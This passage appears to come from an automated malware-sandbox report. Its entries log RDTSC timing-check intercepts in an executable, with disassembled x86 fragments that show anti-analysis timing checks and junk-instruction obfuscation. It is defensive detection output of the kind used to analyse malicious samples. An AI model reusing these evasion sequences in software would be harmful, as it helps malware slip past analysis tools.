                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8A30 second address: 4A8A3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jns 00007F5E60BA1656h 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8A3C second address: 4A8A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8A40 second address: 4A8A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60BA1667h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F5E60BA1667h 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8ED1 second address: 4A8EF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC696h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F5E60CAC686h 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A8EF5 second address: 4A8EF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 443592 second address: 443596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 443596 second address: 4435B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F5E60BA166Bh 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4435B9 second address: 4435D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E60CAC692h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B04B3 second address: 4B04EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA165Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F5E60BA165Ah 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 pushad 0x00000015 je 00007F5E60BA1656h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d popad 0x0000001e pushad 0x0000001f push esi 0x00000020 pop esi 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 popad 0x00000024 popad 0x00000025 mov eax, dword ptr [eax] 0x00000027 push eax 0x00000028 push edx 0x00000029 jbe 00007F5E60BA1658h 0x0000002f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B04EE second address: 4B050A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007F5E60CAC686h 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B05A7 second address: 4B05AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B05AB second address: 4B05F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F5E60CAC68Fh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jo 00007F5E60CAC69Dh 0x00000018 jmp 00007F5E60CAC697h 0x0000001d push ebx 0x0000001e pushad 0x0000001f popad 0x00000020 pop ebx 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 push eax 0x00000025 push edx 0x00000026 push ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B05F0 second address: 4B05F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B05F5 second address: 4B05FA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B05FA second address: 4B061B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5E60BA1664h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B0788 second address: 4B078D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5FA0 second address: 4B5FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5FA6 second address: 4B5FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5FAA second address: 4B5FB4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5E60BA1656h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5FB4 second address: 4B5FC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 je 00007F5E60CAC686h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5FC9 second address: 4B5FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5FD4 second address: 4B5FEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60CAC696h 0x00000009 pop edi 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5FEF second address: 4B5FF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5FF5 second address: 4B5FF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B4C9B second address: 4B4C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5252 second address: 4B5256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5422 second address: 4B5426 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B56CC second address: 4B56D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B593F second address: 4B5943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5943 second address: 4B5963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F5E60CAC692h 0x0000000c jns 00007F5E60CAC686h 0x00000012 pop edi 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5963 second address: 4B59D7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5E60BA1658h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b jmp 00007F5E60BA1660h 0x00000010 jmp 00007F5E60BA1667h 0x00000015 jmp 00007F5E60BA1668h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push esi 0x00000020 jp 00007F5E60BA1656h 0x00000026 pushad 0x00000027 popad 0x00000028 pop esi 0x00000029 push edi 0x0000002a pushad 0x0000002b popad 0x0000002c jmp 00007F5E60BA1667h 0x00000031 pop edi 0x00000032 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B59D7 second address: 4B59DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B59DC second address: 4B59E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B59E4 second address: 4B59F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60CAC68Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5B3E second address: 4B5B4F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jg 00007F5E60BA1656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5E00 second address: 4B5E0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5E0C second address: 4B5E12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5E12 second address: 4B5E36 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F5E60CAC692h 0x00000008 jmp 00007F5E60CAC68Bh 0x0000000d pop ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB715 second address: 4BB71C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB71C second address: 4BB721 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA130 second address: 4BA15B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5E60BA1658h 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5E60BA165Fh 0x00000011 jmp 00007F5E60BA1660h 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA436 second address: 4BA43B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA72A second address: 4BA730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA98E second address: 4BA9B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 push esi 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e jmp 00007F5E60CAC695h 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB0F4 second address: 4BB10F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1665h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 465E9D second address: 465EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 465EA3 second address: 465EA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 465EA7 second address: 465EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 465EAD second address: 465EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F5E60BA1656h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB543 second address: 4BB548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB548 second address: 4BB557 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA165Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE62F second address: 4BE635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE635 second address: 4BE63A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE63A second address: 4BE641 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C168A second address: 4C16B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA165Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F5E60BA1668h 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C16B9 second address: 4C16C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C16C1 second address: 4C16D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5E60BA165Dh 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C78BC second address: 4C78C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C78C0 second address: 4C78D0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5E60BA1656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C78D0 second address: 4C78D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6851 second address: 4C6861 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E60BA165Ch 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6861 second address: 4C6865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6865 second address: 4C68B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60BA165Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jp 00007F5E60BA166Fh 0x00000014 jns 00007F5E60BA165Ch 0x0000001a jbe 00007F5E60BA1658h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C68B0 second address: 4C68B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7201 second address: 4C721C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1666h 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C721C second address: 4C7222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7539 second address: 4C753D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C753D second address: 4C7541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9B1C second address: 4C9B2F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5E60BA1658h 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b jp 00007F5E60BA1656h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489352 second address: 489356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489356 second address: 48935A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48935A second address: 489360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489360 second address: 48936A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5E60BA165Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48936A second address: 48937B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007F5E60CAC694h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48937B second address: 48937F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48937F second address: 4893AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D21AEh], ecx 0x0000000d sbb di, 6F5Bh 0x00000012 lea eax, dword ptr [ebp+1248E0E4h] 0x00000018 mov edx, dword ptr [ebp+122D1E37h] 0x0000001e push eax 0x0000001f je 00007F5E60CAC698h 0x00000025 push eax 0x00000026 push edx 0x00000027 ja 00007F5E60CAC686h 0x0000002d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4893AC second address: 4893B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489881 second address: 48988A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48995C second address: 489961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489961 second address: 48997E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F5E60CAC686h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F5E60CAC68Ch 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48997E second address: 489989 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F5E60BA1656h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489989 second address: 4899AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5E60CAC696h 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4899AC second address: 489A5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA1665h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jc 00007F5E60BA166Ah 0x00000011 jmp 00007F5E60BA1664h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push edx 0x0000001b jng 00007F5E60BA1665h 0x00000021 jmp 00007F5E60BA165Fh 0x00000026 pop edx 0x00000027 pop eax 0x00000028 push 00000000h 0x0000002a push edi 0x0000002b call 00007F5E60BA1658h 0x00000030 pop edi 0x00000031 mov dword ptr [esp+04h], edi 0x00000035 add dword ptr [esp+04h], 0000001Bh 0x0000003d inc edi 0x0000003e push edi 0x0000003f ret 0x00000040 pop edi 0x00000041 ret 0x00000042 mov edi, dword ptr [ebp+1246885Eh] 0x00000048 mov dword ptr [ebp+122D206Eh], edx 0x0000004e call 00007F5E60BA1659h 0x00000053 push edi 0x00000054 jmp 00007F5E60BA1668h 0x00000059 pop edi 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F5E60BA165Ah 0x00000062 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489B8C second address: 489BEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC692h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b pushad 0x0000000c jc 00007F5E60CAC686h 0x00000012 jc 00007F5E60CAC686h 0x00000018 popad 0x00000019 pop esi 0x0000001a xchg eax, esi 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F5E60CAC688h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 nop 0x00000036 push edx 0x00000037 push edx 0x00000038 jmp 00007F5E60CAC68Ch 0x0000003d pop edx 0x0000003e pop edx 0x0000003f push eax 0x00000040 push esi 0x00000041 jng 00007F5E60CAC68Ch 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489DAD second address: 489DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489EC7 second address: 489ECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489ECD second address: 489ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489ED1 second address: 489ED5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489ED5 second address: 489F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007F5E60BA1658h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 mov di, cx 0x00000026 push 00000004h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007F5E60BA1658h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 0000001Bh 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 mov edi, dword ptr [ebp+122D2679h] 0x00000048 nop 0x00000049 push eax 0x0000004a push edx 0x0000004b push edi 0x0000004c jng 00007F5E60BA1656h 0x00000052 pop edi 0x00000053 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489F37 second address: 489F3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 489F3D second address: 489F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
